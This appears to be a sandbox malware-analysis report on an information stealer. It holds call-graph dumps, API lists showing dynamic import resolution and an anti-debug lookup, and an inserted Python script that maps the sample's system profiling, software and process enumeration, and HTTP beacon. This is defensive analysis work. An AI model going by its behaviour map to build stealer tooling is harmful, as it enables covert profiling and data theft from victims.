13879->13880 13881 146910 13880->13881 13881->13641 13883 14a812 13882->13883 13883->13644 13885 14a83f 13884->13885 13886 145b54 13885->13886 13887 14a87b lstrcpy 13885->13887 13886->13654 13887->13886 13889 14a8a0 lstrcpy 13888->13889 13890 146443 13889->13890 13891 14a8a0 lstrcpy 
13890->13891 13892 146455 13891->13892 13893 14a8a0 lstrcpy 13892->13893 13894 146467 13893->13894 13895 14a8a0 lstrcpy 13894->13895 13896 145b86 13895->13896 13896->13660 13898 1345c0 2 API calls 13897->13898 13899 1326b4 13898->13899 13900 1345c0 2 API calls 13899->13900 13901 1326d7 13900->13901 13902 1345c0 2 API calls 13901->13902 13903 1326f0 13902->13903 13904 1345c0 2 API calls 13903->13904 13905 132709 13904->13905 13906 1345c0 2 API calls 13905->13906 13907 132736 13906->13907 13908 1345c0 2 API calls 13907->13908 13909 13274f 13908->13909 13910 1345c0 2 API calls 13909->13910 13911 132768 13910->13911 13912 1345c0 2 API calls 13911->13912 13913 132795 13912->13913 13914 1345c0 2 API calls 13913->13914 13915 1327ae 13914->13915 13916 1345c0 2 API calls 13915->13916 13917 1327c7 13916->13917 13918 1345c0 2 API calls 13917->13918 13919 1327e0 13918->13919 13920 1345c0 2 API calls 13919->13920 13921 1327f9 13920->13921 13922 1345c0 2 API calls 13921->13922 13923 132812 13922->13923 13924 1345c0 2 API calls 13923->13924 13925 13282b 13924->13925 13926 1345c0 2 API calls 13925->13926 13927 132844 13926->13927 13928 1345c0 2 API calls 13927->13928 13929 13285d 13928->13929 13930 1345c0 2 API calls 13929->13930 13931 132876 13930->13931 13932 1345c0 2 API calls 13931->13932 13933 13288f 13932->13933 13934 1345c0 2 API calls 13933->13934 13935 1328a8 13934->13935 13936 1345c0 2 API calls 13935->13936 13937 1328c1 13936->13937 13938 1345c0 2 API calls 13937->13938 13939 1328da 13938->13939 13940 1345c0 2 API calls 13939->13940 13941 1328f3 13940->13941 13942 1345c0 2 API calls 13941->13942 13943 13290c 13942->13943 13944 1345c0 2 API calls 13943->13944 13945 132925 13944->13945 13946 1345c0 2 API calls 13945->13946 13947 13293e 13946->13947 13948 1345c0 2 API calls 13947->13948 13949 132957 13948->13949 13950 1345c0 2 API calls 13949->13950 13951 132970 13950->13951 13952 1345c0 2 API calls 13951->13952 13953 132989 13952->13953 13954 1345c0 2 API calls 
15265 14254c 15264->15265 15266 148320 17 API calls 15265->15266 15267 142568 15266->15267 15268 14a920 3 API calls 15267->15268 15269 14257b 15268->15269 15270 14a8a0 lstrcpy 15269->15270 15271 142584 15270->15271 15272 14a9b0 4 API calls 15271->15272 15273 1425ae 15272->15273 15274 14a8a0 lstrcpy 15273->15274 15275 1425b7 15274->15275 15276 14a9b0 4 API calls 15275->15276 15277 1425d6 15276->15277 15278 14a8a0 lstrcpy 15277->15278 15279 1425df 15278->15279 15280 14a9b0 4 API calls 15279->15280 15281 142600 15280->15281 15282 14a8a0 lstrcpy 15281->15282 15283 142609 15282->15283 15829 148680 15283->15829 15285 142620 15286 14a920 3 API calls 15285->15286 15287 142633 15286->15287 15288 14a8a0 lstrcpy 15287->15288 15289 14263c 15288->15289 15290 14265a lstrlen 15289->15290 15291 14266a 15290->15291 15292 14a740 lstrcpy 15291->15292 15293 14267c 15292->15293 15294 131590 lstrcpy 15293->15294 15295 14268d 15294->15295 15839 145190 15295->15839 15297 142699 15297->13729 16027 14aad0 15298->16027 15300 135009 InternetOpenUrlA 15304 135021 15300->15304 15301 1350a0 InternetCloseHandle InternetCloseHandle 15303 1350ec 15301->15303 15302 13502a InternetReadFile 15302->15304 15303->13733 15304->15301 15304->15302 16028 1398d0 15305->16028 15307 140759 15308 14077d 15307->15308 15309 140a38 15307->15309 15312 140799 StrCmpCA 15308->15312 15310 131590 lstrcpy 15309->15310 15311 140a49 15310->15311 16204 140250 15311->16204 15314 1407a8 15312->15314 15340 140843 15312->15340 15316 14a7a0 lstrcpy 15314->15316 15318 1407c3 15316->15318 15317 140865 StrCmpCA 15320 140874 15317->15320 15357 14096b 15317->15357 15319 131590 lstrcpy 15318->15319 15321 14080c 15319->15321 15322 14a740 lstrcpy 15320->15322 15323 14a7a0 lstrcpy 15321->15323 15325 140881 15322->15325 15326 140823 15323->15326 15324 14099c StrCmpCA 15327 1409ab 15324->15327 15346 140a2d 15324->15346 15328 14a9b0 4 API calls 15325->15328 15329 14a7a0 lstrcpy 15326->15329 15330 131590 lstrcpy 15327->15330 15331 1408ac 
15328->15331 15333 14083e 15329->15333 15334 1409f4 15330->15334 15332 14a920 3 API calls 15331->15332 15335 1408b3 15332->15335 16031 13fb00 15333->16031 15337 14a7a0 lstrcpy 15334->15337 15339 14a9b0 4 API calls 15335->15339 15338 140a0d 15337->15338 15341 14a7a0 lstrcpy 15338->15341 15342 1408ba 15339->15342 15340->15317 15343 140a28 15341->15343 15346->13737 15357->15324 15679 14a7a0 lstrcpy 15678->15679 15680 131683 15679->15680 15681 14a7a0 lstrcpy 15680->15681 15682 131695 15681->15682 15683 14a7a0 lstrcpy 15682->15683 15684 1316a7 15683->15684 15685 14a7a0 lstrcpy 15684->15685 15686 1315a3 15685->15686 15686->14560 15688 1347c6 15687->15688 15689 134838 lstrlen 15688->15689 15713 14aad0 15689->15713 15691 134848 InternetCrackUrlA 15692 134867 15691->15692 15692->14637 15694 14a740 lstrcpy 15693->15694 15695 148b74 15694->15695 15696 14a740 lstrcpy 15695->15696 15697 148b82 GetSystemTime 15696->15697 15699 148b99 15697->15699 15698 14a7a0 lstrcpy 15700 148bfc 15698->15700 15699->15698 15700->14652 15702 14a931 15701->15702 15703 14a988 15702->15703 15705 14a968 lstrcpy lstrcat 15702->15705 15704 14a7a0 lstrcpy 15703->15704 15706 14a994 15704->15706 15705->15703 15706->14655 15707->14770 15709 134eee 15708->15709 15710 139af9 LocalAlloc 15708->15710 15709->14658 15709->14661 15710->15709 15711 139b14 CryptStringToBinaryA 15710->15711 15711->15709 15712 139b39 LocalFree 15711->15712 15712->15709 15713->15691 15714->14780 15715->14921 15716->14923 15717->14931 15846 1477a0 15718->15846 15721 1476c6 RegOpenKeyExA 15723 147704 RegCloseKey 15721->15723 15724 1476e7 RegQueryValueExA 15721->15724 15722 141c1e 15722->15013 15723->15722 15724->15723 15726 141c99 15725->15726 15726->15027 15728 141e09 15727->15728 15728->15069 15730 141e84 15729->15730 15731 147a9a wsprintfA 15729->15731 15730->15083 15731->15730 15733 141efe 15732->15733 15734 147b4d 15732->15734 15733->15097 15853 148d20 LocalAlloc CharToOemW 15734->15853 15737 14a740 lstrcpy 15736->15737 15738 
147bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15737->15738 15745 147c25 15738->15745 15739 147c46 GetLocaleInfoA 15739->15745 15740 147d18 15741 147d1e LocalFree 15740->15741 15742 147d28 15740->15742 15741->15742 15744 14a7a0 lstrcpy 15742->15744 15743 14a9b0 lstrcpy lstrlen lstrcpy lstrcat 15743->15745 15746 147d37 15744->15746 15745->15739 15745->15740 15745->15743 15747 14a8a0 lstrcpy 15745->15747 15746->15110 15747->15745 15749 142008 15748->15749 15749->15125 15751 1494b5 15750->15751 15752 149493 GetModuleFileNameExA CloseHandle 15750->15752 15753 14a740 lstrcpy 15751->15753 15752->15751 15754 142091 15753->15754 15754->15140 15756 147e68 RegQueryValueExA 15755->15756 15758 142119 15755->15758 15757 147e8e RegCloseKey 15756->15757 15757->15758 15758->15154 15760 147fb9 GetLogicalProcessorInformationEx 15759->15760 15761 147fd8 GetLastError 15760->15761 15763 148029 15760->15763 15769 147fe3 15761->15769 15771 148022 15761->15771 15762 142194 15762->15168 15767 1489f0 2 API calls 15763->15767 15766 1489f0 2 API calls 15766->15762 15768 14807b 15767->15768 15770 148084 wsprintfA 15768->15770 15768->15771 15769->15760 15769->15762 15854 1489f0 15769->15854 15857 148a10 GetProcessHeap RtlAllocateHeap 15769->15857 15770->15762 15771->15762 15771->15766 15773 14220f 15772->15773 15773->15182 15775 1489b0 15774->15775 15776 14814d GlobalMemoryStatusEx 15775->15776 15779 148163 __aulldiv 15776->15779 15777 14819b wsprintfA 15778 142289 15777->15778 15778->15196 15779->15777 15781 1487fb GetProcessHeap RtlAllocateHeap wsprintfA 15780->15781 15783 14a740 lstrcpy 15781->15783 15784 14230b 15783->15784 15784->15210 15786 14a740 lstrcpy 15785->15786 15792 148229 15786->15792 15787 148263 15788 14a7a0 lstrcpy 15787->15788 15790 1482dc 15788->15790 15789 14a9b0 lstrcpy lstrlen lstrcpy lstrcat 15789->15792 15790->15227 15791 14a8a0 lstrcpy 15791->15792 15792->15787 15792->15789 15792->15791 15794 14a740 lstrcpy 15793->15794 15795 14835c RegOpenKeyExA 
15794->15795 15796 1483d0 15795->15796 15797 1483ae 15795->15797 15799 148613 RegCloseKey 15796->15799 15800 1483f8 RegEnumKeyExA 15796->15800 15798 14a7a0 lstrcpy 15797->15798 15810 1483bd 15798->15810 15801 14a7a0 lstrcpy 15799->15801 15802 14860e 15800->15802 15803 14843f wsprintfA RegOpenKeyExA 15800->15803 15801->15810 15802->15799 15804 148485 RegCloseKey RegCloseKey 15803->15804 15805 1484c1 RegQueryValueExA 15803->15805 15808 14a7a0 lstrcpy 15804->15808 15806 148601 RegCloseKey 15805->15806 15807 1484fa lstrlen 15805->15807 15806->15802 15807->15806 15809 148510 15807->15809 15808->15810 15811 14a9b0 4 API calls 15809->15811 15810->15253 15812 148527 15811->15812 15813 14a8a0 lstrcpy 15812->15813 15814 148533 15813->15814 15815 14a9b0 4 API calls 15814->15815 15816 148557 15815->15816 15817 14a8a0 lstrcpy 15816->15817 15818 148563 15817->15818 15819 14856e RegQueryValueExA 15818->15819 15819->15806 15820 1485a3 15819->15820 15821 14a9b0 4 API calls 15820->15821 15822 1485ba 15821->15822 15823 14a8a0 lstrcpy 15822->15823 15824 1485c6 15823->15824 15825 14a9b0 4 API calls 15824->15825 15826 1485ea 15825->15826 15827 14a8a0 lstrcpy 15826->15827 15828 1485f6 15827->15828 15828->15806 15830 14a740 lstrcpy 15829->15830 15831 1486bc CreateToolhelp32Snapshot Process32First 15830->15831 15832 14875d CloseHandle 15831->15832 15833 1486e8 Process32Next 15831->15833 15834 14a7a0 lstrcpy 15832->15834 15833->15832 15835 1486fd 15833->15835 15836 148776 15834->15836 15835->15833 15837 14a9b0 lstrcpy lstrlen lstrcpy lstrcat 15835->15837 15838 14a8a0 lstrcpy 15835->15838 15836->15285 15837->15835 15838->15835 15840 14a7a0 lstrcpy 15839->15840 15841 1451b5 15840->15841 15842 131590 lstrcpy 15841->15842 15843 1451c6 15842->15843 15858 135100 15843->15858 15845 1451cf 15845->15297 15849 147720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15846->15849 15848 1476b9 15848->15721 15848->15722 15850 147765 RegQueryValueExA 15849->15850 15851 147780 RegCloseKey 15849->15851 
15850->15851 15852 147793 15851->15852 15852->15848 15853->15733 15855 148a0c 15854->15855 15856 1489f9 GetProcessHeap HeapFree 15854->15856 15855->15769 15856->15855 15857->15769 15859 14a7a0 lstrcpy 15858->15859 15860 135119 15859->15860 15861 1347b0 2 API calls 15860->15861 15862 135125 15861->15862 16018 148ea0 15862->16018 15864 135184 15865 135192 lstrlen 15864->15865 15866 1351a5 15865->15866 15867 148ea0 4 API calls 15866->15867 15868 1351b6 15867->15868 15869 14a740 lstrcpy 15868->15869 15870 1351c9 15869->15870 15871 14a740 lstrcpy 15870->15871 15872 1351d6 15871->15872 15873 14a740 lstrcpy 15872->15873 15874 1351e3 15873->15874 15875 14a740 lstrcpy 15874->15875 15876 1351f0 15875->15876 15877 14a740 lstrcpy 15876->15877 15878 1351fd InternetOpenA StrCmpCA 15877->15878 15879 13522f 15878->15879 15880 1358c4 InternetCloseHandle 15879->15880 15881 148b60 3 API calls 15879->15881 15887 1358d9 codecvt 15880->15887 15882 13524e 15881->15882 15883 14a920 3 API calls 15882->15883 15884 135261 15883->15884 15885 14a8a0 lstrcpy 15884->15885 15886 13526a 15885->15886 15888 14a9b0 4 API calls 15886->15888 15891 14a7a0 lstrcpy 15887->15891 15889 1352ab 15888->15889 15890 14a920 3 API calls 15889->15890 15892 1352b2 15890->15892 15898 135913 15891->15898 15893 14a9b0 4 API calls 15892->15893 15894 1352b9 15893->15894 15895 14a8a0 lstrcpy 15894->15895 15896 1352c2 15895->15896 15897 14a9b0 4 API calls 15896->15897 15899 135303 15897->15899 15898->15845 15900 14a920 3 API calls 15899->15900 15901 13530a 15900->15901 15902 14a8a0 lstrcpy 15901->15902 15903 135313 15902->15903 15904 135329 InternetConnectA 15903->15904 15904->15880 15905 135359 HttpOpenRequestA 15904->15905 15907 1358b7 InternetCloseHandle 15905->15907 15908 1353b7 15905->15908 15907->15880 15909 14a9b0 4 API calls 15908->15909 15910 1353cb 15909->15910 15911 14a8a0 lstrcpy 15910->15911 15912 1353d4 15911->15912 15913 14a920 3 API calls 15912->15913 15914 1353f2 15913->15914 15915 14a8a0 lstrcpy 
15914->15915 15916 1353fb 15915->15916 15917 14a9b0 4 API calls 15916->15917 15918 13541a 15917->15918 15919 14a8a0 lstrcpy 15918->15919 15920 135423 15919->15920 15921 14a9b0 4 API calls 15920->15921 15922 135444 15921->15922 15923 14a8a0 lstrcpy 15922->15923 15924 13544d 15923->15924 15925 14a9b0 4 API calls 15924->15925 15926 13546e 15925->15926 15927 14a8a0 lstrcpy 15926->15927 16019 148ead CryptBinaryToStringA 16018->16019 16023 148ea9 16018->16023 16020 148ece GetProcessHeap RtlAllocateHeap 16019->16020 16019->16023 16021 148ef4 codecvt 16020->16021 16020->16023 16022 148f05 CryptBinaryToStringA 16021->16022 16022->16023 16023->15864 16027->15300 16270 139880 16028->16270 16030 1398e1 16030->15307 16032 14a740 lstrcpy 16031->16032 16033 13fb16 16032->16033 16205 14a740 lstrcpy 16204->16205 16206 140266 16205->16206 16207 148de0 2 API calls 16206->16207 16208 14027b 16207->16208 16209 14a920 3 API calls 16208->16209 16210 14028b 16209->16210 16211 14a8a0 lstrcpy 16210->16211 16212 140294 16211->16212 16213 14a9b0 4 API calls 16212->16213 16214 1402b8 16213->16214 16271 13988d 16270->16271 16274 136fb0 16271->16274 16273 1398ad codecvt 16273->16030 16277 136d40 16274->16277 16278 136d63 16277->16278 16287 136d59 16277->16287 16293 136530 16278->16293 16282 136dbe 16282->16287 16303 1369b0 16282->16303 16284 136e2a 16285 136ef7 16284->16285 16286 136ee6 VirtualFree 16284->16286 16284->16287 16288 136f41 16285->16288 16289 136f26 FreeLibrary 16285->16289 16290 136f38 16285->16290 16286->16285 16287->16273 16288->16287 16291 1489f0 2 API calls 16288->16291 16289->16285 16292 1489f0 2 API calls 16290->16292 16291->16287 16292->16288 16294 136542 16293->16294 16296 136549 16294->16296 16313 148a10 GetProcessHeap RtlAllocateHeap 16294->16313 16296->16287 16297 136660 16296->16297 16302 13668f VirtualAlloc 16297->16302 16299 136730 16300 136743 VirtualAlloc 16299->16300 16301 13673c 16299->16301 16300->16301 16301->16282 16302->16299 16302->16301 16304 1369c9 
16303->16304 16308 1369d5 16303->16308 16305 136a09 LoadLibraryA 16304->16305 16304->16308 16306 136a32 16305->16306 16305->16308 16312 136ae0 16306->16312 16314 148a10 GetProcessHeap RtlAllocateHeap 16306->16314 16308->16284 16309 136ba8 GetProcAddress 16309->16308 16309->16312 16310 1489f0 2 API calls 16310->16312 16311 136a8b 16311->16308 16311->16310 16312->16308 16312->16309 16313->16296 16314->16311
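The edge dump above is the sandbox's call graph for the profiling routine that starts at 141df0: it runs through GetLocalTime, GetTimeZoneInformation, GetUserDefaultLocaleName, GetKeyboardLayoutList, GetSystemPowerStatus, OpenProcess/GetModuleFileNameExA, the registry readers, GetLogicalProcessorInformationEx, GlobalMemoryStatusEx, the installed-software enumeration (RegEnumKeyExA) and the process list (CreateToolhelp32Snapshot/Process32Next), and then hands off to the WinINet beacon (InternetOpenA, InternetConnectA, HttpOpenRequestA). Reading that by eye is slow. The Python below is an added example, not part of the Joe Sandbox report: it parses the report's edge-list format (a node is "id address [labels]", an edge is "src->dst") and walks reachability from a root address to list the Win32 APIs the routine reaches, in discovery order. The excerpt it runs on is a hand-trimmed, re-stitched subset of the dump above (constructed for the example, not a verbatim copy: the lstrcpy and 14a9b0 hops are collapsed), and the stage categories are this editor's labels, not the sandbox's.

```python
import re
from collections import deque

# Constructed excerpt in the report's own edge-list format. Hand-trimmed from the
# dump above and re-stitched, so edges here do not match the full dump one-to-one.
CFG_EXCERPT = """
15064 141df0 15065 14a8a0 lstrcpy 15064->15065 15066 141df9 15065->15066
15727 147980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15066->15727
15728 141e09 15727->15728 15728->15069 15069 14a9b0 4 API calls 15070 141e19 15069->15070
15071 14a8a0 lstrcpy 15070->15071 15072 141e22 15071->15072
15729 147a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15072->15729
15730 141e84 15729->15730 15731 147a9a wsprintfA 15729->15731 15731->15730 15730->15083
15083 14a9b0 4 API calls 15084 141e94 15083->15084
15732 147b00 GetUserDefaultLocaleName 15084->15732 15733 141efe 15732->15733
15734 147b4d 15732->15734 15853 148d20 LocalAlloc CharToOemW 15734->15853 15853->15733
15733->15097 15097 14a9b0 4 API calls 15098 141f0e 15097->15098
15748 147d80 GetSystemPowerStatus 15098->15748 15749 142008 15748->15749 15749->15125
15125 14a9b0 4 API calls 15137 14207e GetCurrentProcessId 15125->15137
15750 149470 OpenProcess 15137->15750 15751 1494b5 15750->15751
15752 149493 GetModuleFileNameExA CloseHandle 15750->15752 15752->15751
15829 148680 15751->15829 15830 14a740 lstrcpy 15829->15830
15831 1486bc CreateToolhelp32Snapshot Process32First 15830->15831
15832 14875d CloseHandle 15831->15832 15833 1486e8 Process32Next 15831->15833 15833->15832
15835 1486fd 15833->15835 15835->15833 15839 145190 15832->15839 15858 135100 15839->15858
15878 1351fd InternetOpenA StrCmpCA 15858->15878 15904 135329 InternetConnectA 15878->15904
15905 135359 HttpOpenRequestA 15904->15905
"""

NODE_ID = re.compile(r'^\d{3,}$')           # graph node ids are decimal
HEX_ADDR = re.compile(r'^[0-9a-f]{5,8}$')   # code addresses are lowercase hex
EDGE = re.compile(r'^(\d+)->(\d+)$')
SUMMARY = re.compile(r'^\d+ API calls$')    # "4 API calls": callee expanded elsewhere
NOT_API = {'codecvt'}                       # CRT/STL helper names, not Win32 imports


def parse_cfg(text):
    """Parse the edge-list dump into ({id: (addr, [api, ...])}, {src: [dst, ...]})."""
    nodes, edges, labels = {}, {}, {}
    toks = text.split()
    cur, i = None, 0
    while i < len(toks):
        m = EDGE.match(toks[i])
        if m:
            edges.setdefault(int(m.group(1)), []).append(int(m.group(2)))
            cur = None                      # an edge terminates the current label
        elif NODE_ID.match(toks[i]) and i + 1 < len(toks) and HEX_ADDR.match(toks[i + 1]):
            cur = int(toks[i])
            nodes[cur] = int(toks[i + 1], 16)
            labels[cur] = []
            i += 1                          # skip the address token
        elif cur is not None:
            labels[cur].append(toks[i])     # everything else is the node's label
        i += 1
    out = {}
    for nid, addr in nodes.items():
        words = [] if SUMMARY.match(' '.join(labels[nid])) else labels[nid]
        out[nid] = (addr, [w for w in words if w not in NOT_API and not w.startswith('__')])
    return out, edges


def reachable_apis(nodes, edges, root_addr):
    """BFS from the node at root_addr; return the API names met, de-duplicated, in discovery order."""
    start = [nid for nid, (addr, _) in nodes.items() if addr == root_addr]
    if not start:
        raise ValueError(f'no node at {root_addr:#x}')
    seen, order, queue = set(), [], deque(start)
    while queue:
        nid = queue.popleft()
        if nid in seen:
            continue
        seen.add(nid)
        for api in nodes.get(nid, (None, []))[1]:
            if api not in order:
                order.append(api)
        queue.extend(edges.get(nid, []))
    return order


# Editor's grouping of the APIs seen in this routine (assumption, not the sandbox's labels).
STAGES = {
    'fingerprint': {'GetLocalTime', 'GetTimeZoneInformation', 'GetUserDefaultLocaleName',
                    'GetKeyboardLayoutList', 'GetSystemPowerStatus', 'GetSystemInfo',
                    'GlobalMemoryStatusEx', 'GetLogicalProcessorInformationEx',
                    'GetModuleFileNameExA', 'GetCurrentProcessId'},
    'registry': {'RegOpenKeyExA', 'RegEnumKeyExA', 'RegQueryValueExA'},
    'process_enum': {'CreateToolhelp32Snapshot', 'Process32First', 'Process32Next'},
    'network': {'InternetOpenA', 'InternetConnectA', 'HttpOpenRequestA',
                'InternetOpenUrlA', 'InternetReadFile'},
}


def stage_profile(apis):
    """Map the reached APIs onto the stages above; stages with no hit are omitted."""
    hit = set(apis)
    return {stage: sorted(hit & names) for stage, names in STAGES.items() if hit & names}


if __name__ == '__main__':
    n, e = parse_cfg(CFG_EXCERPT)
    seq = reachable_apis(n, e, 0x141df0)
    print(' -> '.join(seq))
    for stage, names in stage_profile(seq).items():
        print(f'{stage}: {", ".join(names)}')
```

Run it on the full dump with root 0x141df0 to recover the complete collection order; a label of the form "N API calls" is the sandbox's summary of a callee already expanded elsewhere in the dump and is deliberately not counted as an API name.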

                  Control-flow Graph

                  control_flow_graph 660 149860-149874 call 149750 663 149a93-149af2 LoadLibraryA * 5 660->663 664 14987a-149a8e call 149780 GetProcAddress * 21 660->664 666 149af4-149b08 GetProcAddress 663->666 667 149b0d-149b14 663->667 664->663 666->667 669 149b46-149b4d 667->669 670 149b16-149b41 GetProcAddress * 2 667->670 671 149b4f-149b63 GetProcAddress 669->671 672 149b68-149b6f 669->672 670->669 671->672 673 149b71-149b84 GetProcAddress 672->673 674 149b89-149b90 672->674 673->674 675 149bc1-149bc2 674->675 676 149b92-149bbc GetProcAddress * 2 674->676 676->675
                  APIs
                  • GetProcAddress.KERNEL32(75900000,010206C0), ref: 001498A1
                  • GetProcAddress.KERNEL32(75900000,010205A0), ref: 001498BA
                  • GetProcAddress.KERNEL32(75900000,010205B8), ref: 001498D2
                  • GetProcAddress.KERNEL32(75900000,01020780), ref: 001498EA
                  • GetProcAddress.KERNEL32(75900000,01020678), ref: 00149903
                  • GetProcAddress.KERNEL32(75900000,01028AA0), ref: 0014991B
                  • GetProcAddress.KERNEL32(75900000,01016700), ref: 00149933
                  • GetProcAddress.KERNEL32(75900000,010167A0), ref: 0014994C
                  • GetProcAddress.KERNEL32(75900000,01020618), ref: 00149964
                  • GetProcAddress.KERNEL32(75900000,01020810), ref: 0014997C
                  • GetProcAddress.KERNEL32(75900000,01020720), ref: 00149995
                  • GetProcAddress.KERNEL32(75900000,010207B0), ref: 001499AD
                  • GetProcAddress.KERNEL32(75900000,01016A00), ref: 001499C5
                  • GetProcAddress.KERNEL32(75900000,01020648), ref: 001499DE
                  • GetProcAddress.KERNEL32(75900000,01020690), ref: 001499F6
                  • GetProcAddress.KERNEL32(75900000,010168A0), ref: 00149A0E
                  • GetProcAddress.KERNEL32(75900000,010206A8), ref: 00149A27
                  • GetProcAddress.KERNEL32(75900000,010208A0), ref: 00149A3F
                  • GetProcAddress.KERNEL32(75900000,01016800), ref: 00149A57
                  • GetProcAddress.KERNEL32(75900000,01020918), ref: 00149A70
                  • GetProcAddress.KERNEL32(75900000,01016820), ref: 00149A88
                  • LoadLibraryA.KERNEL32(010208B8,?,00146A00), ref: 00149A9A
                  • LoadLibraryA.KERNEL32(01020858,?,00146A00), ref: 00149AAB
                  • LoadLibraryA.KERNEL32(010208D0,?,00146A00), ref: 00149ABD
                  • LoadLibraryA.KERNEL32(010208E8,?,00146A00), ref: 00149ACF
                  • LoadLibraryA.KERNEL32(01020870,?,00146A00), ref: 00149AE0
                  • GetProcAddress.KERNEL32(75070000,01020888), ref: 00149B02
                  • GetProcAddress.KERNEL32(75FD0000,01020900), ref: 00149B23
                  • GetProcAddress.KERNEL32(75FD0000,01028DF0), ref: 00149B3B
                  • GetProcAddress.KERNEL32(75A50000,01028C40), ref: 00149B5D
                  • GetProcAddress.KERNEL32(74E50000,010169E0), ref: 00149B7E
                  • GetProcAddress.KERNEL32(76E80000,01028AF0), ref: 00149B9F
                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00149BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00149BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: f4730380f9c9e9e980e273af06bdb9e5d7192fe967c7147d1adf4cdff0a0da4a
                  • Instruction ID: 9acfe3d4cd8a4a292fff3ae24b2a08b4de6001544d399fc1767fd941f02f2245
                  • Opcode Fuzzy Hash: f4730380f9c9e9e980e273af06bdb9e5d7192fe967c7147d1adf4cdff0a0da4a
                  • Instruction Fuzzy Hash: 76A149B5504A80AFD36AEFA8ED8995A3BFDF7C8301F04451AA61D83264D63998C1DF13

                  Control-flow Graph

                  control_flow_graph 764 1345c0-134695 RtlAllocateHeap 781 1346a0-1346a6 764->781 782 13474f-1347a9 VirtualProtect 781->782 783 1346ac-13474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0013460E
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0013479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001345C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001346CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001346B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001346C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001346D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0013466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001345D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00134713
